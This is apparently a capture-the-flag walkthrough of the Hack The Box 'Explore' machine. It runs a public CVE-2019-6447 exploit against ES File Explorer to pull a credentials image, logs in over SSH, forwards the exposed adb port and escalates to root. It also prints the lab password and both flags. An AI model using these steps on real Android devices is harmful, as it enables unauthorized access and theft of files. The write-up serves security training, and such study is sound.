Enumeration
As usual, let's start with nmap:
nmap -sV -Pn -p- 10.10.10.247
![](https://static.wixstatic.com/media/bc0a6b_95ed07763f8a41b69414b152a15864df~mv2.png/v1/fill/w_980,h_260,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_95ed07763f8a41b69414b152a15864df~mv2.png)
I googled the following:
port 5555 android --> adb (Android Debug Bridge)
port 59777 android --> ES File Explorer, which runs an HTTP server on this port that is affected by CVE-2019-6447. Anyone who can reach the port can send it commands without any authentication: list the files, pictures, videos and installed apps on the device, fetch any file the app can read, and launch applications.
From your attackers' machine do the following:
Go to exploit database https://www.exploit-db.com/
Click on Search EDB
and type 2019-6447 in the CVE field
Click on the exploit
Download the exploit
Go to your Downloads folder:
cd Downloads
ls
![](https://static.wixstatic.com/media/bc0a6b_c74ba643c4a24a6cbd8c853fb3af8441~mv2.png/v1/fill/w_980,h_245,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_c74ba643c4a24a6cbd8c853fb3af8441~mv2.png)
Let's try to run this exploit using:
python3 50070.py
![](https://static.wixstatic.com/media/bc0a6b_069af2684b5f43078c9f28a6d78310e9~mv2.png/v1/fill/w_980,h_98,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_069af2684b5f43078c9f28a6d78310e9~mv2.png)
Looks like the script needs a command followed by the target IP. The exploit-db page lists the supported commands; one of them, listPics, lists all the pictures on the device, so let's try that:
python3 50070.py listPics 10.10.10.247
![](https://static.wixstatic.com/media/bc0a6b_3922feaa136e4e7886fceab3adfc9cd6~mv2.png/v1/fill/w_829,h_615,al_c,q_90,enc_auto/bc0a6b_3922feaa136e4e7886fceab3adfc9cd6~mv2.png)
Looks like there is an interesting picture called creds.jpg
Let's try to get this file using getFile:
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
![](https://static.wixstatic.com/media/bc0a6b_3ce1bdbd7e16442b8be6fc3c0e3151ab~mv2.png/v1/fill/w_980,h_229,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_3ce1bdbd7e16442b8be6fc3c0e3151ab~mv2.png)
The file has been downloaded to our machine as out.dat. Let's check what it is:
![](https://static.wixstatic.com/media/bc0a6b_9431c50fd34946e99ae7a04aa2cabceb~mv2.png/v1/fill/w_980,h_480,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_9431c50fd34946e99ae7a04aa2cabceb~mv2.png)
When we open the file we see the following:
![](https://static.wixstatic.com/media/bc0a6b_38ea03a347b2487bb70e13185b90cb44~mv2.png/v1/fill/w_550,h_170,al_c,q_85,enc_auto/bc0a6b_38ea03a347b2487bb70e13185b90cb44~mv2.png)
Looks like a password for username kristi:
Kr1sT!5h@Rp3xPl0r3!
We can see from the nmap that port 2222 is open, which is ssh. So let's try to ssh using these credentials:
ssh kristi@10.10.10.247 -p 2222
![](https://static.wixstatic.com/media/bc0a6b_304bf84c47eb42998d7bb5e2c521a765~mv2.png/v1/fill/w_980,h_125,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_304bf84c47eb42998d7bb5e2c521a765~mv2.png)
Type yes and press enter
![](https://static.wixstatic.com/media/bc0a6b_b5a6971ea0994017a5380430184a5831~mv2.png/v1/fill/w_980,h_217,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_b5a6971ea0994017a5380430184a5831~mv2.png)
enter the password we just found
Kr1sT!5h@Rp3xPl0r3!
![](https://static.wixstatic.com/media/bc0a6b_346228c56b064f74b35487fedd9acfe2~mv2.png/v1/fill/w_980,h_210,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_346228c56b064f74b35487fedd9acfe2~mv2.png)
We are in!
id
![](https://static.wixstatic.com/media/bc0a6b_6144240a154c490a8a54d57ed13de616~mv2.png/v1/fill/w_980,h_75,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_6144240a154c490a8a54d57ed13de616~mv2.png)
ls
![](https://static.wixstatic.com/media/bc0a6b_c2e33a0d44a5452cb7e939a3e809b0bb~mv2.png/v1/fill/w_980,h_522,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_c2e33a0d44a5452cb7e939a3e809b0bb~mv2.png)
cd sdcard
ls
![](https://static.wixstatic.com/media/bc0a6b_ec5941623d5b49e9a8c62ae8699a7d07~mv2.png/v1/fill/w_980,h_171,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_ec5941623d5b49e9a8c62ae8699a7d07~mv2.png)
cat user.txt
![](https://static.wixstatic.com/media/bc0a6b_80a3bdb488d0461a8c039212a9dceb40~mv2.png/v1/fill/w_510,h_72,al_c,q_85,enc_auto/bc0a6b_80a3bdb488d0461a8c039212a9dceb40~mv2.png)
f32017174c7c7e8f50c6da52891ae250
Congratulations! You got the user flag!
cd ..
ls
![](https://static.wixstatic.com/media/bc0a6b_39d9116f93784919a8f0982798cec7ee~mv2.png/v1/fill/w_980,h_495,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_39d9116f93784919a8f0982798cec7ee~mv2.png)
Let's see which ports the Android device is listening on:
netstat -tulpn | grep LISTEN
![](https://static.wixstatic.com/media/bc0a6b_301e9d4ad46a4c7984e502672cef9d45~mv2.png/v1/fill/w_980,h_160,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_301e9d4ad46a4c7984e502672cef9d45~mv2.png)
We can see that port 5555 (adb) is listening on the device.
Port forwarding
What local port forwarding is:
Local port forwarding is configured with the -L option:
ssh -L 5555:machine2:5555 machine1
This logs in to machine1 and opens a listener on port 5555 on our own machine. Every connection made to that local port is carried over the SSH session to machine1, which then connects to port 5555 on machine2. The host name in the middle of the -L argument is resolved by machine1, not by us.
In our case the service we want is on the SSH server itself, so the destination is localhost as seen from the target:
ssh -L 5555:localhost:5555 kristi@IP -p 2222
This logs in to the HTB target (the Explore machine) and forwards anything we send to port 5555 on our VM, through the SSH session, to port 5555 on the target, where adb is listening (netstat told us).
Open a new command prompt on your VM
ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
![](https://static.wixstatic.com/media/bc0a6b_0ed4e51de6c64c459914c0116459fcd6~mv2.png/v1/fill/w_980,h_169,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_0ed4e51de6c64c459914c0116459fcd6~mv2.png)
Enter the password we found earlier
Kr1sT!5h@Rp3xPl0r3!
![](https://static.wixstatic.com/media/bc0a6b_807a497b10b34073a46b035781630689~mv2.png/v1/fill/w_980,h_173,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_807a497b10b34073a46b035781630689~mv2.png)
adb
ADB (Android Debug Bridge) is a command line tool that lets you communicate with an Android device. Developers use it mainly to install and debug apps, and it also provides a Unix shell on the device. When adbd is set to listen on TCP (port 5555) without requiring key authentication, anyone who can reach that port gets that shell, which is why an exposed adb port is treated as a critical finding.
An Android emulator is a virtual device running on your computer that lets you develop and test an Android app without a physical device.
Open a new command prompt on your VM
sudo apt install adb
Press Y to continue
![](https://static.wixstatic.com/media/bc0a6b_7fefae6df6a14cf5bf3a58d8ebe9cb94~mv2.png/v1/fill/w_980,h_520,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_7fefae6df6a14cf5bf3a58d8ebe9cb94~mv2.png)
If the install fails, refresh the package index and retry:
sudo apt-get update
![](https://static.wixstatic.com/media/bc0a6b_a2ee4f81a26a401c895dcea3e83453bd~mv2.png/v1/fill/w_980,h_347,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_a2ee4f81a26a401c895dcea3e83453bd~mv2.png)
sudo apt install adb
Press Y to continue.
This time it worked: adb is installed.
adb devices
![](https://static.wixstatic.com/media/bc0a6b_34f87726c5774d26969eeb0cc0256a6e~mv2.png/v1/fill/w_952,h_223,al_c,q_85,enc_auto/bc0a6b_34f87726c5774d26969eeb0cc0256a6e~mv2.png)
adb connect localhost:5555
![](https://static.wixstatic.com/media/bc0a6b_f072dcf2789b4839b939faaf624219a3~mv2.png/v1/fill/w_741,h_184,al_c,q_85,enc_auto/bc0a6b_f072dcf2789b4839b939faaf624219a3~mv2.png)
adb devices
![](https://static.wixstatic.com/media/bc0a6b_163507b3826847debe19d2e6d6fab8ef~mv2.png/v1/fill/w_859,h_264,al_c,q_85,enc_auto/bc0a6b_163507b3826847debe19d2e6d6fab8ef~mv2.png)
adb shell
If adb refuses because more than one device or emulator is registered, select the target by the serial that adb devices printed:
adb -s localhost shell
![](https://static.wixstatic.com/media/bc0a6b_856987acabd941b9b52e42756c6b1c65~mv2.png/v1/fill/w_712,h_322,al_c,q_85,enc_auto/bc0a6b_856987acabd941b9b52e42756c6b1c65~mv2.png)
whoami
![](https://static.wixstatic.com/media/bc0a6b_d50a8d56dc8249dd9281406d0587a185~mv2.png/v1/fill/w_761,h_181,al_c,q_85,enc_auto/bc0a6b_d50a8d56dc8249dd9281406d0587a185~mv2.png)
su
The su command switches to the superuser (root). On this device it does not prompt for a password, so a shell obtained through the exposed adb port turns straight into root.
![](https://static.wixstatic.com/media/bc0a6b_34b51110dd4049018a9419e20b84f1cb~mv2.png/v1/fill/w_516,h_95,al_c,q_85,enc_auto/bc0a6b_34b51110dd4049018a9419e20b84f1cb~mv2.png)
whoami
![](https://static.wixstatic.com/media/bc0a6b_5d0ffc60af06404586186bd777b0b13a~mv2.png/v1/fill/w_362,h_119,al_c,q_85,enc_auto/bc0a6b_5d0ffc60af06404586186bd777b0b13a~mv2.png)
we are now root!
ls
![](https://static.wixstatic.com/media/bc0a6b_0e66922e60564835bd3e0338511ad977~mv2.png/v1/fill/w_980,h_494,al_c,q_90,usm_0.66_1.00_0.01,enc_auto/bc0a6b_0e66922e60564835bd3e0338511ad977~mv2.png)
cd data
ls
![](https://static.wixstatic.com/media/bc0a6b_86f28e99b5f74573a77cd8f01958e7e6~mv2.png/v1/fill/w_980,h_312,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/bc0a6b_86f28e99b5f74573a77cd8f01958e7e6~mv2.png)
cat root.txt
![](https://static.wixstatic.com/media/bc0a6b_e2ed75be8dc84b07b849610492c6cd25~mv2.png/v1/fill/w_496,h_124,al_c,q_85,enc_auto/bc0a6b_e2ed75be8dc84b07b849610492c6cd25~mv2.png)
f04fc82b6d49b41c9b08982be59338c5
Congratulations! You got the root flag!